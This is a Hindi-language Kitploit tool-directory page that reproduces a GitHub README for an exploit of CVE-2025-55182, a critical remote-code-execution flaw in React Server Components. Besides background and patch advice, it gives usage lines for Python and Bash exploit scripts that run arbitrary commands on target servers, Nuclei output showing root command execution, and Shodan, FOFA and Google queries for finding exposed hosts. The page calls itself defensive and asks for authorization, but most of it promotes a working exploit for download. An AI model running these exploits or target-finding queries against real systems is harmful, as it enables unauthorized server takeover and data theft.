Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182 — कई पैकेजों में React Server Components (RSC) कार्यान्वयन को प्रभावित करने वाली एक गंभीर Remote Code Execution (RCE) भेद्यता, जिसमें शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/cyberleelawat/cve-2025-55182
भेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubcyberleelawat/cve-2025-55182

CVE-2025-55182

कई पैकेजों में React Server Components (RSC) कार्यान्वयन को प्रभावित करने वाली एक गंभीर Remote Code Execution (RCE) भेद्यता, जिसमें शामिल हैं।

रिपॉजिटरी देखें
112 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 – React सर्वर घटक रिमोट कोड निष्पादन

React2Shell Banner CVE-2025-55182 CVE-2025-66478 CVSS

निर्माता : Virendra Kumar

कंपनी : Cyber Leelawat

वेबसाइट :

www.cyberleelawat.in

अवलोकन

CVE-2025-55182 एक गंभीर रिमोट कोड निष्पादन (RCE) भेद्यता है जो कई पैकेजों में React सर्वर घटकों (RSC) के कार्यान्वयन को प्रभावित करती है, जिनमें शामिल हैं:

  • react-server-dom-webpack
  • react-server-dom-turbopack
  • react-server-dom-parcel

यह भेद्यता RSC द्वारा उपयोग किए जाने वाले आंतरिक Flight प्रोटोकॉल के माध्यम से भेजे गए पेलोड के असुरक्षित डी-सीरियलाइज़ेशन के कारण उत्पन्न होती है। जब कुछ अविश्वसनीय इनपुट HTTP अनुरोधों के माध्यम से React सर्वर घटकों में प्रवाहित होता है, तो सर्वर-साइड कोड निष्पादन ट्रिगर हो सकता है।

प्रभावित संस्करणों में शामिल हैं:

  • 19.0.0
  • 19.1.0
  • 19.1.1
  • 19.2.0

पैच किए गए संस्करणों में शामिल हैं:

  • 19.0.1
  • 19.1.2
  • 19.2.1

भेद्यता कैसे काम करती है (उच्च स्तर)

React सर्वर घटक क्लाइंट-साइड अनुरोधों को स्वीकार करते हैं जिन्हें बैकएंड पर पार्स और डी-सीरियलाइज़ किया जाता है। यह भेद्यता आवक डेटा के डी-सीरियलाइज़ेशन के आसपास अपर्याप्त नियंत्रणों से उत्पन्न होती है, जिससे विशेष रूप से तैयार किए गए पेलोड को निष्पादन योग्य सर्वर-साइड घटकों के रूप में व्याख्यायित किया जा सकता है।

जब ऐसा होता है, तो सर्वर पर मनमाना JavaScript निष्पादन हो सकता है, जो होस्टिंग वातावरण और विशेषाधिकारों के आधार पर सर्वर के पूर्ण समझौते का कारण बन सकता है।


मूल कारण

  • RSC Flight प्रोटोकॉल स्ट्रीम में उचित इनपुट सत्यापन का अभाव।
  • सर्वर विश्वास सीमा को गलत तरीके से सुरक्षित मान लिया गया।
  • अविश्वसनीय उपयोगकर्ता इनपुट से असुरक्षित सर्वर-साइड पार्सिंग।

प्रभाव

यदि इसका शोषण किया जाता है, तो एक हमलावर निम्न कार्य करने में सक्षम हो सकता है:

  • रिमोट कोड निष्पादन प्राप्त करना
  • मनमाने सर्वर-साइड कमांड निष्पादित करना
  • डेटाबेस या OS-स्तरीय संसाधनों तक पहुंच प्राप्त करना
  • मैलवेयर या बैकडोर स्थापित करना
  • संवेदनशील डेटा चुराना
  • इन्फ्रास्ट्रक्चर के भीतर पार्श्व गति (lateral movement) करना

CVSS स्कोर: 10.0 – गंभीर (CRITICAL)


मैन्युअल परीक्षण (सुरक्षित रक्षात्मक पहचान)

प्राथमिक उद्देश्य:

सत्यापित करें कि क्या एप्लिकेशन React सर्वर घटकों को उजागर करता है और क्या प्रभावित संस्करण उपयोग में हैं।

चरण 1 — प्रतिक्रिया विशेषताओं के माध्यम से RSC उपस्थिति की जांच करें

root@kitploit:~
curl -I https://target.com/?__rsc=1

Google टोही (रक्षात्मक कीवर्ड)

ये कीवर्ड यह पहचानने में मदद करते हैं कि कोई सार्वजनिक रूप से सुलभ रिपॉजिटरी या वेब एप्लिकेशन RSC घटकों का संदर्भ देती है या नहीं।

root@kitploit:~
"React Server Components" "Flight" inurl:src
"react-server-dom-webpack" filetype:lock
"server.references" "react"
"rsc" "react-dom"

जांचें:

  • क्या RSC सुविधाएं मौजूद हैं?
  • क्या पैकेज फ्रंट-एंड बंडलों में दिखाई देते हैं?
  • क्या सार्वजनिक Git संदर्भ हैं?

उदाहरण आंतरिक Google क्वेरी (केवल आपके अपने दायरे में)

root@kitploit:~
site:yourdomain.com "react-server"
site:yourdomain.com "flight" "react"
site:yourdomain.com "rsc"

केवल आपके संगठन के डोमेन के आंतरिक ऑडिट के लिए अभिप्रेत है।


Shodan (सुरक्षित प्रौद्योगिकी फ़िंगरप्रिंटिंग)

एक्सपोज़्ड फ्रेमवर्क उपयोग की जांच करें, भेद्यता शोषण की नहीं।

root@kitploit:~
http.title:"Next.js"
"powered by" "Next.js"
X-Powered-By: Next.js
http.favicon.hash=

FOFA प्रौद्योगिकी वर्गीकरण केवल

root@kitploit:~
title="Next.js"
header="next-router-state-tree"
body="/_next/static/"
server="next"

स्वचालित परीक्षण (आंतरिक / प्रयोगशाला)

रक्षात्मक स्कैनिंग को स्वचालित करने के लिए, अपने स्वयं के इन्फ्रास्ट्रक्चर मूल्यांकन हेतु टेम्पलेट-आधारित डिटेक्शन लॉजिक क्लोन करें:

root@kitploit:~
git clone https://github.com/cyberleelawat/CVE-2025-55182.git
cd CVE-2025-55182

Nuclei टेम्पलेट

root@kitploit:~
$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml

[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.

Python RCE एक्सप्लॉइट (CVE-2025-55182.py)

पूर्ण-विशेषताओं वाला RCE एक्सप्लॉइट स्क्रिप्ट जो मनमाने कमांड निष्पादित करता है और आउटपुट प्राप्त करता है।

उपयोग:

root@kitploit:~
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"

Bash एक्सप्लॉइट

स्थापना

root@kitploit:~
chmod +x scanner.sh

उपयोग

root@kitploit:~
# Scan with default command (id)
./scanner.sh -d example.com

# Execute custom command
./scanner.sh -d example.com -c "whoami"

# With full URL
./scanner.sh -d https://example.com -c "uname -a"

विकल्प

  • -d, --domain - लक्ष्य डोमेन/URL (आवश्यक)
  • -c, --command - निष्पादित करने के लिए कमांड (डिफ़ॉल्ट: id)

उदाहरण

root@kitploit:~
# Check if target is vulnerable
./scanner.sh -d vulnerable-app.com

# Get system information
./scanner.sh -d vulnerable-app.com -c "uname -a"

# List files
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"

आवश्यकताएं

  • Bash

  • curl

  • openssl

    श्रेय: Bash और Python स्क्रिप्ट मूल रूप से @zack0x01 और @sickwell द्वारा बनाई गई थीं। प्रशंसा के साथ उपयोग की गईं।

रिपॉजिटरी के अंदर मौजूद टेम्पलेट निम्नलिखित के लिए अभिप्रेत हैं:

  • संस्करण पहचान
  • दृश्यता जांच
  • इन्फ्रास्ट्रक्चर इन्वेंट्री
  • भेद्यता जागरूकता

महत्वपूर्ण: ये टेम्पलेट केवल उन्हीं सिस्टम पर निष्पादित किए जाने चाहिए जिनके आप स्वामी हैं या जिनका मूल्यांकन करने के लिए आप अधिकृत हैं।


Nuclei (रक्षात्मक उपयोग वक्तव्य)

इस रिपॉजिटरी में शामिल Nuclei टेम्पलेट केवल निम्नलिखित के लिए अभिप्रेत हैं:

  • निर्भरता संस्करण सत्यापन
  • अप्रत्यक्ष फ़िंगरप्रिंटिंग
  • निष्क्रिय जांच
  • आंतरिक सुरक्षा ऑडिटिंग

कृपया सुनिश्चित करें:

  • आपके पास लिखित प्राधिकरण है
  • आप केवल अपनी स्वयं की संपत्तियों को स्कैन कर रहे हैं
  • आप स्थानीय कानूनों और नीति का अनुपालन करते हैं

अनुशंसित शमन उपाय

तुरंत अपडेट करें

पैच किए गए रिलीज़ में से किसी एक में अपग्रेड करें:

  • 19.0.1
  • 19.1.2
  • 19.2.1

यदि आप तुरंत पैच नहीं कर सकते हैं

  • RSC सुविधाओं को अस्थायी रूप से अक्षम करें
  • सर्वर घटकों को अलग करें
  • WAF नियम लागू करें
  • उजागर नेटवर्क सतह को प्रतिबंधित करें

🤝 मुझसे जुड़ें

👨‍💻 Cyber Leelawat

सुरक्षा शोधकर्ता • साइबर सुरक्षा प्रशिक्षक • बग बाउंटी हंटर

आदर्श वाक्य: शून्य विश्वास, पूर्ण सुरक्षा 🚀

GitHub Instagram
LinkedIn WhatsApp Channel
WhatsApp Group

निष्कर्ष

CVE-2025-55182 वर्तमान में React-आधारित इन्फ्रास्ट्रक्चर के लिए सबसे गंभीर खतरों में से एक है। तुच्छ शोषण वेक्टर और बिना प्रमाणीकरण वाली हमले की सतह के कारण, तुरंत पैचिंग की दृढ़ता से अनुशंसा की जाती है। प्रभावित RSC संस्करणों को चलाने वाले किसी भी संगठन को आपातकालीन प्राथमिकता पर विचार करना चाहिए।


कानूनी / नैतिक सूचना

यह रिपॉजिटरी और दस्तावेज़ीकरण आपके स्वामित्व वाली संपत्तियों के रक्षात्मक अनुसंधान और सुरक्षा सत्यापन के लिए हैं। किसी भी दुरुपयोग का परिणाम अवैध हो सकता है। कानूनों और संगठनात्मक नीति का अनुपालन करने की जिम्मेदारी आपकी है।

Cyber Leelawat द्वारा ❤️ के साथ निर्मित

शून्य विश्वास, पूर्ण सुरक्षा 🎯🔐

टूल डाउनलोड करें